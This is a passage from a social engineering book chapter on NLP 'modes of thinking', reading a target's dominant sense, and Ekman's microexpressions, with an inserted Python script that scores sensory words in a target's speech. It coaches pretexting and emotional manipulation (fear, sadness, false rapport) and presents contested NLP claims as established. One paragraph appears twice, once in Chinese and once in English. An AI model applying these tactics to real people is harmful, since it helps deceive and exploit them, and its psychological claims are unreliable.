
Some of the principles of Richard Bandler and John Grinder, the originators of neurolinguistic programming, changed people’s understanding of thought patterns and the power of words. These principles are the subject of much debate; this chapter attempts to demystify them and explain how you can use them in social engineering.

Some of the best interrogators on the planet developed training and frameworks to help law enforcement learn how to effectively interrogate suspects. These principles have such deep psychological roots that learning the methods used can literally unlock the doors to the minds of your targets.

Using cues that people give in their speech, gestures, eyes, and faces can make you appear to be a mind reader. This chapter examines these skills and explains them in detail so they can be utilized by a professional social engineer.

Rapport is a word often used by sales trainers and salespeople, but it is a very important aspect of gaining trust and displaying confidence. Knowing how to instantly develop rapport with people is a skill that truly enhances the skill set of a social engineer, and this chapter shows you how.

This chapter finishes with my own personal research on how you can use these skills to hack the human mind. A buffer overflow is an attack in which a hacker feeds a program more input than it was written to handle, so that the hacker’s own code, usually malicious, runs through the normal use of that host program. When it fires, the program does what the hacker wants. What if it were possible to run “commands” on the human mind that would cause the target to do what you ask, give over information you seek, and, in essence, prove that the human mind can be manipulated?

This powerful information, of course, can be used for very malicious intentions. My goal in releasing this information to the public in this way is to pull back the curtain from what the “bad guys” are doing by exposing their methods, thinking, and principles, then analyzing each one and showing what you can learn from it. Exposing these techniques makes identifying, defending against, and mitigating these attacks easier for everyone.

This chapter is truly a mind-altering collection of data and principles. Following, studying, and researching the methods will not just enhance any security endeavors but these principles can also alter the way you communicate and interact with others.

By no means, though, is this chapter a complete collection that covers all aspects of each of these skills. I provide links and tips to where you can find more information and programs to help you enhance these skills. This chapter sets a foundation as well as acts like a guide, pointing you in a direction so you can learn to enhance each skill over time.

Learning social engineering skills is not a quick process, so don’t be impatient. Some of these skills can take years to perfect and a lot of practice to even become proficient in. Of course, you may already possess a skill for a certain aspect, but if you do not, don’t become impatient with trying to learn it. Keep trying harder and practicing and you will get it.

Before you get into the meat of this chapter, the following section sets the stage for why and how these principles will work. You must understand the modes of thinking that exist. After you understand more clearly how people take in and process information you can begin to understand the emotional, psychological, and physical representations of that process.

Modes of Thinking

To alter someone’s way of thinking you must understand the way people think and in what modes they think. This seems a logical first step to even attempting this aspect of social engineering.

You might think you need to be a psychologist or a neurologist to understand the many aspects of how a person can think. Although that can help, it is not necessary. With a little research and some practical application you can delve into the inner workings of the human mind.

In August of 2001 the FBI put out a law enforcement bulletin (www.social-engineer.org/wiki/archives/ModesOfThinking/MOT_FBI_3of5.htm) that made a few very profound statements on the modes in which people think:

Simply confirming your nonverbal behavior to the client, using language from the client’s preferred representational system and matching speech volume, tone, and area of speech often overcomes client reluctance to communicate.

This simple statement has a lot of depth in it. Basically it is saying that if you can first figure out the target’s dominant mode of thinking and then confirm it in subtle ways, you can unlock the doors of the target’s mind and help him actually feel at ease when telling you even intimate details. Logically you may ask then, “How do I figure out a target’s dominant mode of thinking?”

Even asking people what their mode of thinking is will not offer a clear answer, because many people do not know what mode of thinking they usually reside in. Because of that, as a social engineer you must have some tools to help you determine this mode and then quickly switch gears to match it. A clear and easy path to this answer exists, but you need to know the basics first.

The Senses

For centuries philosophers have argued the value of perception. Some go so far as to say that reality is not “real” but just what our senses build into our perceptions. Personally, I do not subscribe to that idea, but I believe that the world is brought to our brain by our senses. People interpret those senses for their perception of reality. In the traditional classification we have five senses: sight, hearing, touch, smell, and taste.

People tend to favor one of these senses and that is the one that is dominant. It is also the way people tend to remember things. As one exercise to determine your dominant sense, close your eyes and picture yourself waking up this morning—what is the very first thing you remember?

Was it the feeling of the warm sun on your face? Or maybe you remember the sound of the voice of your spouse or children calling you? Do you remember clearly the smell of coffee downstairs? Or quite possibly the bad taste in your mouth, reminding you that you need to brush your teeth?

Of course, this science is not exact and realizing what your dominant sense is may take a few tries to figure out. I once talked to a couple about this concept and it was interesting to watch their expressions. The wife first remembered waking up and seeing the clock and then worrying that she was running late, whereas the husband first remembered rolling over and not feeling his wife next to him. After some more questions it became evident that the husband was kinesthetic, that is, his dominant sense was feeling, whereas his wife was very visual.

Of course, walking up to your target and saying, “Close your eyes and tell me the first thing you remember this morning,” doesn’t seem reasonable. Unless, of course, your pretext is the family shrink, you might meet with some opposition on this route.

How can you determine a target’s dominant sense without putting her through an embarrassing interrogation about her morning rituals?

The Three Main Modes of Thinking

Although we have five senses, the modes of thinking are associated with only three of them:
 
     
  • Sight, or a visual thinker
  • Hearing, or an auditory thinker
  • Feeling, or a kinesthetic thinker
 

Each sense has a range within which it works, or a sub-modality. Is something too loud or too soft? Too bright or too dark? Too hot or too cold? Examples of these are as follows: staring at the sun is too bright, jet engines are too loud, and –30 degrees Fahrenheit is too cold. Ivan Pavlov ran an experiment where he rang a bell every time he fed a dog. In the end the dog would hear the sound of the bell, then salivate. What most people don’t know is that he was more interested in the physical and emotional aspects of sub-modalities. The interesting point is that the louder the bell rang the more the dog salivated. The range change of the sub-modality produced a direct physical change. Pavlov’s research and all of his lectures are discussed in much detail at www.ivanpavlov.com.

Even though people are very different from dogs, Pavlov’s research is very important in understanding how a person thinks. Many of us can think in all three modes, but we dominate in one—one “rings” the loudest. Even within our dominant mode, we might have varying degrees of depth for that dominant sense.

The following sections discuss some of the details of each of these modes in more depth.

Visual

The majority of people are visual thinkers, in that they remember what something looked like. They remember the scene clearly—the colors, the textures, the brightness or darkness. They can clearly picture a past event and even build a picture for a future event. When they are presented with material to decide upon they often need something to see, because visual input is directly linked to their decision making. Many times a visual thinker will make a decision based on what is visually appealing to him regardless of what is really “better” for him.

Although men tend to be visual, this does not mean that all men are always visual. That visual marketing or visual aspects normally appeal to men is true, but do not assume all men are visual.

A visual person often uses certain words in his speech, such as:
 
     
  • “I see what you mean.”
  • “That looks good to me.”
  • “I get the picture now.”
 

And the range that the dominant sense works in for a visual thinker can have certain characteristics, or sub-modalities, such as:
 
     
  • Light (bright or dim)
  • Size (large or small)
  • Color (black and white or color)
  • Movement (fast or slow)
  • Focus (clear or hazy)
 

Trying to debate, sell, negotiate, manipulate, or influence a visual thinker with no visual input is very difficult if not impossible. Visual thinkers need visual input to make decisions.

Auditory

Auditory thinkers remember the sounds of an event. They remember that the alarm was too loud or that the woman whispered too low. They recall the sweetness of the child’s voice or the scary bark of the dog. Auditory thinkers learn better from what they hear and can retain far more from being told things than from being shown things.

Because an auditory thinker remembers the way something sounded, or because the sounds themselves help recall memories, he may use phrases such as:
 
     
  • “Loud and clear…”
  • “Something tells me…”
  • “That sounds okay to me.”
 

And the range of this dominant sense can be within these sub-modalities:
 
     
  • Volume (loud or soft)
  • Tone (bass or treble)
  • Pitch (high or low)
  • Tempo (fast or slow)
  • Distance (near or far)
 

It is imperative to choose your words carefully with auditory thinkers. The words they hear will make or break the deal. I have seen whole encounters go from great to a disaster with one wrong word spoken to an auditory thinker.

Kinesthetic

Kinesthetic thinkers are concerned with feelings. They remember how an event made them feel—the warmth of the room, the beautiful breeze on their skin, how the movie made them jump out of their seat with fear. Often kinesthetic thinkers feel things with their hands to get a sense of the objects. Merely telling them something is soft isn’t as real as letting them touch it. But helping them recall a soft item they touched before can bring back emotions and feelings that are very real to a kinesthetic thinker.

The term “kinesthetic” relates to tactile, visceral, and sense-of-self sensations of the body—basically, where a person’s body is in space and the self-awareness of how something made him feel. A kinesthetic thinker uses phrases such as:
 
     
  • “I can grasp that idea.”
  • “How does that grab you?”
  • “I’ll get in touch with you.”
  • “I just wanted to touch base.”
  • “How does this feel?”
 

And the range for this type can have the following sub-modalities:
 
     
  • Intensity (strong or weak)
  • Area (large or small)
  • Texture (rough or smooth)
  • Temperature (hot or cold)
  • Weight (heavy or light)
 

Helping a kinesthetic thinker recall a feeling or emotion tied to something can make those emotions reappear as real as the first time they occurred. Kinesthetic thinkers are probably the most difficult for non-kinesthetic thinkers to deal with, because they do not react to sights and sounds; a social engineer has to get in touch with their feelings to communicate with this type of thinker.

Understanding these basic principles can go a long way toward being able to quickly discern the type of person you are talking to. Again, without asking the target to picture his morning rituals how can you discern the dominant sense? Even more so, why is this so important?

Discerning the Dominant Sense

The key to determining someone’s dominant sense is to introduce yourself, start a small conversation, and pay close attention to what is being said. As you walk up to the target and lean in to say good morning, maybe she barely looks at you. She might be rude, or she just may not be a visual. Visuals need to look at the person speaking to communicate properly, so this behavior would seem to suggest she is not visual. Now ask a simple question such as, “Don’t you just love the feel of a beautiful day like today?” and notice her response, particularly whether she seems to light up or not.

Maybe you wear a large, shiny silver ring. As you talk you gesture; maybe you see that the ring catches her eye. Does she reach out, interested, and need to hold the ring or get close to observe it? Kinesthetics are very touchy-feely when it comes to these things. I know a woman who is a strong kinesthetic and when she sees something she thinks is soft or high quality she must touch it. She will say, “Wow, that sweater looks so soft!” From that statement one might assume she is a visual, but what happens next is what solidifies it. She then walks up to the person and touches the sweater and feels it. This shows her dominant sense is kinesthetic. The same woman must touch everything in the grocery store when she shops, whether she needs it or not. By touching the objects, she makes a connection and that connection makes it real to her. Often she cannot remember things very well that she did not come into physical contact with.

Asking questions that contain some of the key dominant words, observing a target’s reactions, and listening can reveal what dominant sense he or she uses. Listening for key words such as see, look, bright, and dark can lead you to treat a target like a visual. As mentioned earlier, this is not an exact science. There is no general rule that states that if a person says, “I can see what you are saying…” then he is always a visual. Each clue should lead you down the path toward verifying your hunch with more questions or statements. One word of caution: talking to someone in a different mode than they think in can be irritating to some. Using questions to determine a person’s mode of thinking can be off-putting. Use questions sparingly and rely more on observation.
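
The keyword listening described above can also be done after the fact, for example when reviewing the recording or chat log of an elicitation call during a social engineering engagement. The following is an added example written for this edition and not the book’s own code or method: it counts visual, auditory, and kinesthetic predicate words in whatever a target said and reports the leading mode, or nothing when there is no clear leader. The word lists start from the phrases the chapter gives and are extended with other common sensory predicates; those extensions, the crude suffix stripping, and the sample utterances are assumptions made for the example, and the result is a hint to verify in conversation, not a verdict.

```python
"""Score what a target says for visual, auditory and kinesthetic predicates.

Added example, not from the book. The word lists extend the chapter's short
phrase lists with other common sensory predicates (an assumption), and the
output is only a hint to be verified by further observation.
"""
import re
from collections import Counter

# Predicate words per mode. Words the chapter itself uses ("see", "look",
# "picture", "loud", "tell", "sound", "grasp", "grab", "touch", "feel") plus
# assumed extensions. Ambiguous words such as "clear" and "light", which the
# chapter lists under more than one mode, are deliberately left out.
PREDICATES = {
    "visual": {"see", "saw", "look", "picture", "view", "bright", "dark",
               "hazy", "focus", "show", "appear", "imagine", "watch",
               "vivid", "perspective", "illustrate"},
    "auditory": {"hear", "heard", "listen", "sound", "loud", "quiet", "tell",
                 "say", "tone", "ring", "resonate", "tune", "harmony",
                 "silent"},
    "kinesthetic": {"feel", "felt", "touch", "grasp", "grab", "handle",
                    "warm", "cold", "rough", "smooth", "solid", "pressure",
                    "heavy", "hold"},
}


def _normalize(word: str) -> str:
    """Crude suffix stripping so "looks", "feeling" and "sounded" match.

    A suffix is only removed when at least three letters remain, which keeps
    "sees" from collapsing to "se" before the trailing "s" is tried.
    """
    for suffix in ("ing", "ed", "es", "s"):
        if word.endswith(suffix) and len(word) - len(suffix) >= 3:
            return word[: -len(suffix)]
    return word


def score_predicates(text: str) -> dict:
    """Count predicate hits per mode for one utterance or a whole transcript."""
    counts = Counter({mode: 0 for mode in PREDICATES})
    for raw in re.findall(r"[a-z]+", text.lower()):
        word = _normalize(raw)
        for mode, words in PREDICATES.items():
            if word in words:
                counts[mode] += 1
    return dict(counts)


def likely_mode(text: str, margin: int = 1):
    """Return the mode with the most hits, or None when there is no clear lead.

    A lead smaller than `margin` (so, by default, a tie) returns None, in
    keeping with the chapter's warning that this is not an exact science.
    """
    counts = score_predicates(text)
    ranked = sorted(counts.items(), key=lambda kv: kv[1], reverse=True)
    (top_mode, top), (_, second) = ranked[0], ranked[1]
    if top == 0 or top - second < margin:
        return None
    return top_mode


if __name__ == "__main__":
    # Constructed sample utterances built from the chapter's own phrases.
    samples = [
        "I see what you mean. That looks good to me. I get the picture now.",
        "Loud and clear, something tells me that sounds okay to me.",
        "I can grasp that idea. How does that grab you? I'll get in touch "
        "with you. How does this feel?",
        "I see how that feels.",          # tie between visual and kinesthetic
        "Please send the report today.",  # no sensory predicates at all
    ]
    for line in samples:
        print(f"{likely_mode(line)!s:12} {score_predicates(line)}  <- {line}")
```

Run on a transcript, the score is most useful as a running tally across several of the target’s turns rather than on a single sentence, since one “I see” proves nothing; the `margin` argument can be raised when the transcript is long enough to demand a wider lead before the label is trusted.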

Why Understanding the Mode Is Important

I once worked with a guy, Tony, who could sell a cup of water to a drowning man. Tony was a big believer in seeking out and then using a person’s dominant sense in sales. He had a few methods that you may learn from. When he first engaged the target he held a very shiny silver-and-gold pen in his hand. He would gesture a lot and notice whether the person followed the pen with her eyes; if she did slightly, Tony would continually make the gestures bigger to see whether her eyes followed. If that didn’t seem to work in the first few seconds he would click the pen open and closed. It wasn’t a loud noise, but loud enough to disrupt a thought and draw someone’s attention if she were an auditory. If he thought that was working he would click it with every important thought, causing the target to have a psychological reaction to the sound and what was being said. If that didn’t seem to work he would reach out over the table and tap her wrist or forearm, or if he was close enough touch her shoulder. He didn’t touch excessively, but enough to see whether she would shy away or seem overly happy or disturbed by the touch.

With these subtle methods he could quickly discern what the person’s dominant sense most likely was. This whole act would take under 60 seconds. After he found the information he was looking for, he would then start to move his conversation to that dominant sense, even taking on the traits of that sense in the words he spoke and way he acted and reacted to the conversation. One thing about Tony is that he outsold any person I have ever met. People would often say about him, “It is like he knew exactly what I needed.”

Tony would talk to the person and treat the person the way they wanted to be talked to. If the person was a visual thinker, Tony would use phrases like “Can you see what I am saying?” or “How does this look to you?” He would use illustrations that involved “seeing” things or visualizing scenarios. He would put people in their comfort zone.

People feel at ease when they are in their comfort zone. The more you can do as a social engineer to put people in their comfort zone, the better chance you have at success. People gravitate towards those with whom they are comfortable; it is human nature. For example, if someone makes you feel “warm and fuzzy,” or seems to understand what you are saying, or seems to see where you are coming from, you easily open up to, trust, and let that person in your circle.

I want to reiterate this point: finding and using someone’s dominant sense is not an exact science. A social engineer should use it as one tool in the arsenal and not rely on it as something magical or scientific. Certain psychological aspects of human nature, on the other hand, are based on proven science and can be relied upon. As a matter of fact, some of these aspects are so impressive that they can make you seem like a mind reader. Some of them have been a topic of serious debate, and some have been accepted by psychologists, law enforcement, and social engineers for years. The next section of this chapter discusses these, starting with microexpressions.

Microexpressions

You are probably familiar with the idea of reading facial expressions. When someone feels happy, sad, angry, or any other emotion, you can look at his or her face and see it. What if someone tries to fake that expression, like a fake smile? We have all done it, walking through the market and bumping into someone we just don’t like that much—we put on a “smile” and say, “Hey John, nice to see you. Say hi to Sally.”

We may act very pleasant and cordial, but inside we are feeling nothing but irritation. The expressions that we show on our face for longer periods of time are called macroexpressions, and they generally make it easier for people to see the emotion being conveyed. Like microexpressions, macroexpressions are driven by our emotions, but they are not involuntary and often can be faked.

A certain few pioneers in the study of human behavior have spent decades researching something they coined microexpressions, to understand how humans relay emotions.

Microexpressions are expressions that are not easily controllable and occur in reaction to emotions. An emotion triggers certain muscular reactions in a face and those reactions cause certain expressions to appear. Many times these expressions last for as short as one-twenty-fifth of a second. Because they are involuntary muscular movements due to an emotional response, they are nearly impossible to control.

This definition is not a new understanding either; Charles Darwin wrote a book in 1872 called The Expression of the Emotions in Man and Animals. In this book Darwin noted the universal nature of facial expressions and how muscles were used in facial expressions.

In the early 1960s two researchers, Haggard and Isaacs, first discovered what today is called microexpressions. In 1966, Haggard and Isaacs outlined how they discovered these “micromomentary” expressions in their publication titled Micromomentary Facial Expressions as Indicators of Ego Mechanisms in Psychotherapy.

Also in the 1960s, William Condon, a pioneer who studied hours of tapes frame by frame, discovered that humans had “micro-movements.” He also heavily researched neurolinguistic programming (more on that later) and body language.

Probably one of the most influential researchers in the field of microexpressions is Dr. Paul Ekman. Dr. Ekman pioneered microexpressions into the science it is today. Dr. Ekman has been studying microexpressions for more than 40 years, receiving the Research Scientist Award as well as being labeled one of Time Magazine’s most influential people on earth in 2009.

Dr. Ekman researched facial expressions with psychologist Silvan Tomkins. His research revealed that, contrary to popular belief, emotions are not culturally determined, but are biological and universal across cultures.

他与莫琳·奥沙利文博士合作开发了一个名为“巫师计划”的项目他率先将微表情用于测谎。他以来自各行各业和各种文化的 15,000 人为样本,发现在如此庞大的样本中,只有 50 人能够在未经训练的情况下识别谎言。

Working with Dr. Maureen O’Sullivan he developed a project called the Wizards Project. He began to pioneer the use of microexpressions in lie detection. He used a base of 15,000 people from all walks of life and all cultures and found out of that large number that only 50 had the ability to spot a deception without training.

In the 1970s Dr. Ekman developed FACS (Facial Action Coding System) to label and number each conceivable human expression. His work branched out to not only include facial expressions but also how the whole body was involved in deception.

By 1972, Dr. Ekman had identified a list of expressions that were linked with basic or biologically universal emotions:

  • Anger
  • Disgust
  • Fear
  • Joy
  • Sadness
  • Surprise

Dr. Ekman’s work began to take on a following, and many law enforcement and corporate environments began to use this research in detecting deception. In 1990, in a paper entitled “Basic Emotions,” Dr. Ekman revised his original list to include a range of positive and negative emotions (www.paulekman.com/wp-content/uploads/2009/02/Basic-Emotions.pdf). Dr. Ekman has published many books on emotions, facial expressions, and lie detection that can help each person to understand the value in being able to decode facial expressions.

This brief history indicates that the subject of microexpressions is not some fantasy; on the contrary, real doctors, researchers, and professionals in the field of human behavior have put countless hours into understanding microexpressions. As a social engineer, understanding microexpressions can go a long way toward protecting your clients and teaching them how to notice subtle hints of deception.

If you are a social engineer, or just a person interested in learning about microexpressions, I strongly suggest reading Dr. Ekman’s books, especially Emotions Revealed and Unmasking the Face. He is truly the authority on this topic. The following sections describe the microexpressions in a simplistic format so you can see how you can use this later on as a social engineer.

As mentioned earlier, Dr. Ekman labeled six main microexpressions and later on added contempt to the list, making seven. The following sections cover these one by one.

Anger

Anger is usually easier to spot than some other expressions. In anger the lips become narrow and tense. The eyebrows slant downward and are pushed together—then comes the most noticeable characteristic of anger, the glare.

Anger is a strong emotion and can trigger many other emotions along with it. Sometimes when a person feels anger at something, what you see is a microexpression such as that shown in Figure 5-1. What makes it hard to see is that the facial movements may last only one-twenty-fifth of a second.

Figure 5-1: Notice the glare, tense lips and tightened brows.

Dr. Paul Ekman

Learning to see a specific microexpression can greatly enhance your understanding of people. To learn how to do so, Dr. Ekman recommends practicing that expression on yourself. He says follow these steps:

1. Pull your eyebrows down and together; pretend you are trying to touch your nose with the inner parts of your eyebrows.

2. While your brows are down, try to open your eyes wide, without adjusting your brow position.

3. Press your lips together tight. Do not pucker your lips, just tense them together.

4. Glare.

What emotion do you feel? The first time I did this, I was overwhelmed with anger. The following is a vital point to this chapter:

If producing the facial expression can cause the emotion, that must mean that our facial movements can affect the emotions we feel, and maybe even the emotions of those around us.

Practice this emotion in a mirror until you get it right. Figure 5-2 shows a picture of a young woman showing us exactly how anger is displayed.

Figure 5-2: Notice the definite expression of anger on her face.

Thefinalmiracle (Nikhil Gangavane) | Dreamstime.com

It is just as pronounced as in Figure 5-1 and the icy cold gaze gives it away too.

Mastering the ability to reproduce microexpressions will go a long way toward understanding the emotion behind them. When you can successfully reproduce and decode a microexpression, you can understand the emotion that is causing it. At that point you can understand the mental state of the person you are dealing with. Not only reproducing them on yourself but also being able to see and read them in others can be helpful in controlling the outcome of your social engineering engagements.

Disgust

Disgust is a strong emotion usually in reaction to something you really do not like. This “something” does not always have to be a physical object; it can also be something that is based on a belief or feeling.

A food that you truly hate can cause the feeling of disgust, which will trigger this expression. What is amazing is even in the absence of the actual smell or sight of the food, the thought of it can cause the same emotion.

When I was a teenager, I went to Disney World with a few friends. I am not, and I mean not, a fan of roller coasters. After much prodding I went on Space Mountain, an indoor roller coaster. About halfway through I had determined that I really didn’t mind roller coasters when suddenly I was smeared with something very wet and chunky. I was then hit with an odor that I can only describe as stomach contents. Not only me, but many behind me had the same reaction and none of us could hold back our lunch, so to speak. Before you knew it, a simultaneous puking splattered the glass of the Tomorrowland Transit Authority, a slow-moving observation ride that offers a peek into the actual Space Mountain ride on part of its journey. What is amazing is that people in the Tomorrowland ride who sat there slowly going around the park saw the aftereffects hit the glass as they rode through, and saw all the other riders getting physically ill, which made them also vomit—yet they didn’t smell the odor or have physical contact with the puke from the roller coaster riders. Why?

Disgust. Bodily fluids generally bring on feelings of disgust and this is one reason that while reading this paragraph you probably started to exhibit the expressions of disgust.

Disgust is often characterized by the upper lip being raised to expose the teeth, and a wrinkling of the nose. It may also result in both cheeks being raised when the nose is wrinkled up, as if to try to block the passage of the bad smell or thought into one’s personal space.

Whatever the man in Figure 5-3 just saw, it caused a very noticeable display of disgust.

Figure 5-3: Clear signs of disgust with a wrinkled nose and raised lip.

© Mightyjohn | dreamstime.com

Disgust is one of those emotions, according to Dr. Ekman’s research, that is in reaction to the sight, smell, or even thought of something distasteful. From a social engineering standpoint this emotion might not lead you down paths of success, but it can surely help you to see whether you are hitting the mark with your target or causing him or her to mentally shut down to your ideas.

The odds are that if you cause disgust for any reason in your target, you have lost. If your appearance, smell, style, breath, or other aspect of your person can make a person feel disgust, then it will most likely close the door to success. You must be aware of what is acceptable and unacceptable to your targets. For example, if your audit is for a prestigious law firm and you have many piercings or tattoos, a very strong negative emotion may rise in your target, which can close the door to your social engineering attempt. If you see a facial expression similar at all to Figure 5-4 then you know it is time to leave the scene.

Figure 5-4: If you see this expression, something is wrong.

You must seriously consider your appearance when working on your pretext. If you happen to notice the strong negative emotion of disgust in your target, then backing down and politely excusing yourself to rework your pretext or find a different path in may be a good idea.

Contempt

Contempt is a very strong emotion that is often confused with disgust because it is so closely linked. Dr. Ekman didn’t even include contempt on his first list of the base emotions.

In Dr. Ekman’s book Emotions Revealed he says, “Contempt is only experienced about people or the actions of people, but not about tastes, smells, or touches.” He then gave an example of eating calf brains, which might be disgusting to you as a thought, and will trigger disgust. Yet seeing someone eating them may trigger contempt for the person committing the act, not the act itself.

The fact that contempt is directed at a person rather than an object is crucial to understanding the microexpressions that go along with it. Being able to see whether the person you are dealing with is feeling contempt can help you to pinpoint more closely the reason for his or her emotion.

Contempt is distinguished by wrinkling the nose and raising the lip, but only on one side of the face, whereas disgust is the raising of the whole lip and the wrinkling of the whole nose. A very subtle contempt expression can be seen in Figure 5-5 whereas a more pronounced one is shown in Figure 5-6.

Try to mimic contempt, and if you are like me, you will quickly feel anger and contempt in your heart. Performing this exercise and seeing how these reactions affect you emotionally is interesting.

Figure 5-5: Notice the slight nose wrinkle and the raising of only the right side of Dr. Ekman’s face.

Dr. Paul Ekman

Figure 5-6: Notice the signs of contempt are more prominent in this picture.

Dr. Paul Ekman

Contempt is often accompanied by anger, because the things that can cause contempt in a person can also trigger strong negative emotions. Contempt is one emotion you want to avoid triggering in anyone with whom you are dealing, especially if you are in a social engineering engagement.

Fear

Fear is often confused with surprise because the two emotions cause similar muscular reactions in the face. Recently while on a plane, I was about to write the section on happiness, but something amazing happened at that time that served as the impetus for writing this section on fear instead.

I am not a short man, being 6’3”, and not a small build, either. While I sat on the plane with a few hours to kill I thought I would take advantage of the time to work. Let me add that coach seats aren’t what they used to be. As I sat with my laptop open staring off into space I pondered how to start the section I had intended to write. I soon realized I was meant to start writing about fear, because the gentleman next to me pulled out a water bottle and took a swig, but I didn’t see him recap the bottle. Out of the corner of my eye I saw his bottle falling from his hands and toward my keyboard. My instant reaction was easily identified as fear.

My eyes opened wide, while my eyebrows crunched together inward. My lips pulled together and out towards my ears. Of course, I didn’t realize all this as it was happening, but afterward I was able to analyze what had happened and I knew I had felt fear. I then analyzed the way I felt my face move and determined that if I repeated the expression I felt that same emotion all over again. I am sure I looked similar to what is seen in Figure 5-7.

Try to see whether you can generate this emotion in yourself by following these steps:

1. Raise your eyebrows as high as they will go.

2. Drop your mouth open slightly and pull the corners of your lips back.

3. If you can, pull your eyebrows together while raising them as high as you can.

How did you feel? How about in your hands and arms and your stomach? Did you notice any semblance of fear? If not, try the exercise again but think back to a time when you were in a situation (something similar to my plane experience, or a car in front of you screeching to a halt) out of your control. See how you feel then.

Figure 5-7: Clear signs of fear.

Dr. Paul Ekman

Most likely you will feel the emotion. A friend of mine sent me this picture of his daughter's first roller coaster ride (Figure 5-8). You can clearly see the raised eyebrows, eyes wide and the mouth open with lips pulled back.

From a social engineering standpoint, fear is often used to cause people to react a certain way. Malicious social engineers use fear tactics to get an unsuspecting user to click a banner or give up a valuable piece of information. For example, malicious banners might claim “Your computer is infected with a virus. Click here to get fixed now!!” These banners work against non-technical users who fear the virus and will click, only to be infected at that point.

Figure 5-8: This little girl is showing clear signs of fear on the roller coaster.

Chad Skidmor

One company I worked with was hit by a malicious social engineer who used fear to gain access to the building. Knowing that the CFO was out of town on an important business meeting and could not be disturbed, the social engineer went into the company as a tech support guy. He demanded access to the CFO’s office, which was promptly denied. He then played this line, “Mr. Smith, your CFO, called me and told me that while he was away at this meeting I better come down and fix his e-mail problem and that if it is not fixed while he is gone, heads will roll.”

The secretary feared that if it didn’t get fixed, she would be to blame. Would her boss really be angry? Could her job be at risk? Because she feared a negative outcome, the secretary let the phony tech support guy in. If he was a skilled social engineer he may have been watching her facial expressions and noticing whether she exhibited signs of worry or anxiety, which are related to fear. He then could have played on these signs more and more, getting her to cave in to her fear.

Fear can be a big motivator to do many things that you (or your target) would not normally consider doing.

Surprise

As mentioned earlier, Dr. Ekman and many other psychologists in the area of microexpressions have concurred that surprise is closely linked to fear because of certain similarities. Even so, some marked differences exist, such as the direction the lips take and the way the eyes react.

Try this exercise to show surprise:

1. Raise your eyebrows, not in fear but with the goal of widening your eyes as much as you can.

2. Let your jaw unhinge and open slightly.

3. After you get the expression down pat try doing it quickly.

I noticed I almost was forced to gasp in some air when I did it, causing me to feel something similar to surprise. You should see an expression similar to Figure 5-9.

Figure 5-9: Notice the way the eyes and lips appear similar to fear.

Dr. Paul Ekman

Surprise can be good or bad. Hearing your daughter’s first words, of course, is a good surprise. Or the surprise can be one of an event, statement, or question that you didn’t expect that causes this response.

As you can see in Figure 5-10 whatever that woman must have seen really surprised her. Maybe a gift is being presented or something one of her grandchildren said to her. Notice her eyebrows raised and her jaw is unhinged and open. This kind of surprise is easy to see because it is so pronounced and the expressions are easy to pick out.

Figure 5-10: Often confused with fear, surprise has some minor differences.

© Stylephotographs (Robert Kneschke) | Dreamstime.com

If the surprise is positive, it can often cause a smile or a jovial response after the initial shock wears off. A social engineer can sometimes use surprise to open the target’s door, so to speak; following up with quick wit or a joke can quickly put the target at ease, causing the target to lower his or her guard.

Sadness

Sadness is an overwhelming and strong emotion. Sadness is one of those emotions that we may feel ourselves when we see other people who are expressing this emotion. Some people can feel sadness just by seeing others who are sad, even to the point of crying.

To show you how easily you can feel sadness, try this exercise:

1. Drop your mouth open slightly.

2. Pull the corners of your lips down.

3. Hold your lips in place, and while doing that try to raise your cheeks as if you are squinting.

4. While maintaining that tension, look down and let your upper eyelids droop.

Most likely you will begin to feel sadness. When I first did this exercise, it was overwhelming for me. I instantly felt sad and found I had to control the length of time I performed it because it caused me to be sad for quite a while. To see how this should look, notice the expression in Figure 5-11.

Figure 5-11: Notice the lips and eyes drawn back and down, signifying sadness.

Dr. Paul Ekman

Another aspect of sadness that makes it an amazing emotion is that it does not always have to display as agony or extreme grief. Sadness can be very subtle. Sadness can also be displayed in just one part of the face. People may try to hide sadness by using a fake smile or what I call “stoic eyes,” where they stare straight ahead, almost in a daze, but you can tell they are trying to control the emotion they are feeling.

Take a look at Figure 5-12. In this case you can see an example of sadness when half the face is covered. This woman is showing definite signs of sadness, which can be noticed even though her face is covered. Notice her brow is slightly furrowed as well as her eyelids drooping, and you can see the corners of her mouth pointing downward.

Figure 5-12: Notice the lips drawn back and down, signifying sadness.

Spectrelabs (Adrin Shamsudin) | Dreamstime.com

The eyes are one of the best indicators to reading sadness. The expression is often confused with tiredness and other emotions that can cause similar eye movements. Tying in the body language with what is read on the face can also help to determine if it is sadness or another emotion.

This can be especially true if you are dealing with other cultures, particularly cultures where much of the face is covered by clothing. In many Middle Eastern cultures where women cover much of their face, you may only be able to see the person’s eyes. In these cases it will be very important for the social engineer to also use body language to determine if what they are seeing is genuine sadness.

Sadness is often used in social engineering because it can trigger people to take an action such as donate money or give out information. You have probably seen it used in television commercials showing a very disadvantaged child. These children may be malnourished, poverty stricken, and seemingly unloved, but for just a small donation you can bring a smile to the child’s face. The images of sad, crying, emaciated children will tug at your heartstrings. I am not suggesting that these commercials are malicious social engineering, just that they use social engineering to a degree, by using an emotional trigger to get a reaction out of the target.

Unfortunately, malicious social engineers often use this emotional trigger to obtain things from their targets. I once walked into a restaurant and overheard a young man telling a group of older folks who were leaving that he just ran out of gas on the highway and needed to get home because his wife was nine months pregnant. He had been out of work and had just walked a mile off the highway to use the phone to call his wife and wondered if they could give him $20. When I heard some of the story I slowed down and made believe I was on a phone call to observe the rest. He told his tale and then backed it up with, “Look if you give me your address, I will mail you a check for the $20,” concluding with “I swear to God.”

The story had some elements in it that could elicit compassion, especially when his face showed concern, anxiety, and sadness. He didn’t get $20—he was given $20 by each of the three people in that group. He said “God bless you” a few times and gave the group a few hugs and said he was going to go in to call his wife and tell her he was on the way home. He hugged them and they left feeling as if they had done their good deed for the week.

A few minutes later as I’m eating my meal, I see him at the bar drinking a couple of fully paid-for drinks with his buddies. Mixing a sad story with some sad facial expressions, he had been able to manipulate the emotions of those around him.

Happiness

Happiness can have many facets to it—so many that I can probably make a chapter just on it, but that is not my focus. Dr. Ekman’s books cover many excellent points about happiness and similar emotions and how they affect the person with the emotion and those around him or her.

What I want to focus on are just a couple aspects of happiness—most importantly the difference between a true smile and a fake smile. The true and the fake smile are an important aspect of human expressions to know how to read, and as a social engineer to know how to reproduce.

Has there been a time where you met someone who was very pleasant but after you parted ways your spouse or you yourself said, “That guy was a fake…”?

